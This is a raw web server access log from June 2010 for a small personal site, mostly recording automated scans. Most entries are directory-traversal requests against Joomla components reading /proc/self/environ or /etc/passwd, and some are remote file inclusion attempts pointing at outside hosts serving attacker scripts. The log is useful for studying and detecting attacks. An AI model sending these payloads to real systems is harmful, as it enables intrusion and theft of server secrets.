99.188.49.167 - - [27/Jun/2010:00:58:34 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
99.188.49.167 - - [27/Jun/2010:00:58:34 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
110.45.147.237 - - [27/Jun/2010:00:59:58 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
188.40.246.135 - - [27/Jun/2010:01:00:25 -0500] "GET //index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 294 "-""Advanced Browser (http://www.avantbrowser.com)"
188.40.246.135 - - [27/Jun/2010:01:00:25 -0500] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 299 "-""Advanced Browser (http://www.avantbrowser.com)"
91.132.160.46 - - [27/Jun/2010:01:00:42 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
201.20.37.59 - - [27/Jun/2010:01:01:21 -0500] "GET /logs/access_log.1276819200//linkadmin.php?page=http://plautdietsch.net/myid.jpg? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
218.150.85.170 - - [27/Jun/2010:01:03:55 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:01:09:18 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
91.132.160.46 - - [27/Jun/2010:01:10:01 -0500] "GET /logs/access_log.1274572800/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
91.132.160.46 - - [27/Jun/2010:01:10:02 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
91.132.160.46 - - [27/Jun/2010:01:10:04 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11106 "-""libwww-perl/5.810"
207.46.13.90 - - [27/Jun/2010:01:19:10 -0500] "GET /logs/access_log.1168387200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.150.85.170 - - [27/Jun/2010:01:20:14 -0500] "GET /logs/access_log.1274400000//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:01:20:14 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:01:20:15 -0500] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.825"
67.195.112.180 - - [27/Jun/2010:01:21:26 -0500] "GET /artwork/coffins.htm HTTP/1.0" 200 1485 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.51.33.26 - - [27/Jun/2010:01:24:00 -0500] "GET /logs/access_log.1275696000/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
72.51.33.26 - - [27/Jun/2010:01:24:00 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
72.51.33.26 - - [27/Jun/2010:01:24:00 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
64.150.180.136 - - [27/Jun/2010:01:26:09 -0500] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
64.150.180.136 - - [27/Jun/2010:01:26:57 -0500] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
85.19.150.100 - - [27/Jun/2010:01:28:36 -0500] "GET /?*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
87.206.204.16 - - [27/Jun/2010:01:28:36 -0500] "GET /?*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
85.19.150.100 - - [27/Jun/2010:01:28:36 -0500] "GET /?*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
87.206.204.16 - - [27/Jun/2010:01:32:19 -0500] "GET /?*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
91.132.160.46 - - [27/Jun/2010:01:32:27 -0500] "GET /logs/access_log.1274832000/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
87.206.204.16 - - [27/Jun/2010:01:32:50 -0500] "GET /?*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
94.136.63.119 - - [27/Jun/2010:01:35:00 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
92.240.65.137 - - [27/Jun/2010:01:35:25 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
94.136.63.119 - - [27/Jun/2010:01:35:29 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
86.109.170.175 - - [27/Jun/2010:01:35:30 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
110.45.147.237 - - [27/Jun/2010:01:35:41 -0500] "GET /logs/access_log.1275696000/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
110.45.147.237 - - [27/Jun/2010:01:35:42 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
110.45.147.237 - - [27/Jun/2010:01:35:42 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
94.136.63.119 - - [27/Jun/2010:01:35:56 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
92.240.65.137 - - [27/Jun/2010:01:36:19 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
94.136.63.119 - - [27/Jun/2010:01:36:23 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
67.59.156.163 - - [27/Jun/2010:01:36:31 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
94.136.63.119 - - [27/Jun/2010:01:36:34 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
87.206.204.16 - - [27/Jun/2010:01:36:43 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
218.150.85.170 - - [27/Jun/2010:01:36:44 -0500] "GET /logs/access_log.1274400000//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:01:36:45 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:01:36:45 -0500] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.825"
86.109.170.175 - - [27/Jun/2010:01:36:48 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
87.206.204.16 - - [27/Jun/2010:01:36:59 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:01:37:07 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
94.136.63.119 - - [27/Jun/2010:01:37:34 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
87.206.204.16 - - [27/Jun/2010:01:38:00 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
86.109.170.175 - - [27/Jun/2010:01:38:33 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
92.240.65.137 - - [27/Jun/2010:01:38:38 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
87.206.204.16 - - [27/Jun/2010:01:41:41 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
195.190.166.35 - - [27/Jun/2010:01:43:11 -0500] "GET /logs/access_log.1276473600/images/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.65"
195.190.166.35 - - [27/Jun/2010:01:43:11 -0500] "GET /logs/images/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.65"
195.190.166.35 - - [27/Jun/2010:01:43:11 -0500] "GET /images/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.65"
67.30.129.57 - - [27/Jun/2010:01:44:58 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
67.30.129.57 - - [27/Jun/2010:01:44:58 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
67.30.129.57 - - [27/Jun/2010:01:44:58 -0500] "GET /logs/access_log.1266710400%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
67.30.129.57 - - [27/Jun/2010:01:45:08 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
67.30.129.57 - - [27/Jun/2010:01:45:08 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
67.30.129.57 - - [27/Jun/2010:01:45:08 -0500] "GET /logs/access_log.1266710400%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
92.240.65.137 - - [27/Jun/2010:01:45:14 -0500] "GET /logs/access_log.1274832000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
92.240.65.137 - - [27/Jun/2010:01:45:15 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
92.240.65.137 - - [27/Jun/2010:01:45:16 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11106 "-""libwww-perl/5.803"
86.109.170.175 - - [27/Jun/2010:01:45:35 -0500] "GET /logs/access_log.1274832000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
86.109.170.175 - - [27/Jun/2010:01:45:35 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
86.109.170.175 - - [27/Jun/2010:01:45:35 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11106 "-""libwww-perl/5.79"
218.150.85.170 - - [27/Jun/2010:01:45:41 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:01:45:44 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:01:46:00 -0500] "GET /logs/access_log.1276646400//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:01:46:00 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:01:46:00 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:01:46:00 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:01:46:01 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:01:46:06 -0500] "GET /logs/access_log.1274572800//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:01:46:06 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:01:46:07 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:01:46:08 -0500] "GET /logs/access_log.1276732800//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.825"
67.59.156.163 - - [27/Jun/2010:01:46:24 -0500] "GET /logs/access_log.1274572800/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:01:46:25 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:01:46:25 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
218.150.85.170 - - [27/Jun/2010:01:47:13 -0500] "GET /logs/access_log.1276819200//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.825"
212.241.251.207 - - [27/Jun/2010:01:47:31 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
218.150.85.170 - - [27/Jun/2010:01:47:34 -0500] "GET /logs/access_log.1274572800//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:01:47:35 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:01:47:35 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.825"
67.59.156.163 - - [27/Jun/2010:01:47:46 -0500] "GET /logs/access_log.1274572800/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:01:47:46 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:01:47:46 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
218.150.85.170 - - [27/Jun/2010:01:48:10 -0500] "GET /logs/access_log.1276041600//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.825"
193.231.187.33 - - [27/Jun/2010:01:49:07 -0500] "GET /logs/access_log.1276473600/images/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
193.231.187.33 - - [27/Jun/2010:01:49:07 -0500] "GET /logs/images/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.810"
193.231.187.33 - - [27/Jun/2010:01:49:07 -0500] "GET /images/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.810"
218.150.85.170 - - [27/Jun/2010:01:49:54 -0500] "GET /logs/access_log.1274572800//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:01:49:54 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:01:49:54 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.825"
218.150.85.170 - - [27/Jun/2010:01:51:12 -0500] "GET /logs/access_log.1276819200//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.825"
212.241.251.207 - - [27/Jun/2010:01:52:40 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
67.195.112.180 - - [27/Jun/2010:01:52:50 -0500] "GET /logs/access_log.1174089600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
85.19.150.100 - - [27/Jun/2010:01:53:15 -0500] "GET /logs/access_log.1274832000/?*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.808"
85.19.150.100 - - [27/Jun/2010:01:53:15 -0500] "GET /?*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
85.19.150.100 - - [27/Jun/2010:01:53:16 -0500] "GET /logs/?*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11106 "-""libwww-perl/5.808"
212.241.251.207 - - [27/Jun/2010:01:54:42 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
85.19.150.100 - - [27/Jun/2010:01:55:18 -0500] "GET /logs/access_log.1276214400/?*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.808"
67.59.156.163 - - [27/Jun/2010:01:55:20 -0500] "GET /logs/access_log.1275782400/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:01:55:26 -0500] "GET /logs/access_log.1275782400/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
86.109.170.175 - - [27/Jun/2010:01:55:40 -0500] "GET /logs/access_log.1275868800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
216.127.70.140 - - [27/Jun/2010:01:56:08 -0500] "GET /logs/access_log.1274832000%20%20/index.php?option=com_rd_download&view=download&cid=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
216.127.70.140 - - [27/Jun/2010:01:56:09 -0500] "GET /index.php?option=com_rd_download&view=download&cid=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
216.127.70.140 - - [27/Jun/2010:01:56:09 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
216.127.70.140 - - [27/Jun/2010:01:56:24 -0500] "GET /logs/access_log.1276732800%20%20/index.php?option=com_rd_download&view=download&cid=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
216.127.70.140 - - [27/Jun/2010:01:56:38 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=http://gemanafushi.com//krid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
92.240.65.137 - - [27/Jun/2010:01:56:39 -0500] "GET /logs/access_log.1275868800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
85.19.150.100 - - [27/Jun/2010:01:57:16 -0500] "GET /logs/access_log.1274832000/?*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.808"
85.19.150.100 - - [27/Jun/2010:01:57:16 -0500] "GET /?*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
85.19.150.100 - - [27/Jun/2010:01:57:17 -0500] "GET /logs/?*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11106 "-""libwww-perl/5.808"
86.109.170.175 - - [27/Jun/2010:01:58:13 -0500] "GET /logs/access_log.1276732800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
86.109.170.175 - - [27/Jun/2010:01:58:14 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
86.109.170.175 - - [27/Jun/2010:01:58:14 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11106 "-""libwww-perl/5.79"
86.109.170.175 - - [27/Jun/2010:01:58:16 -0500] "GET /logs/access_log.1274572800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
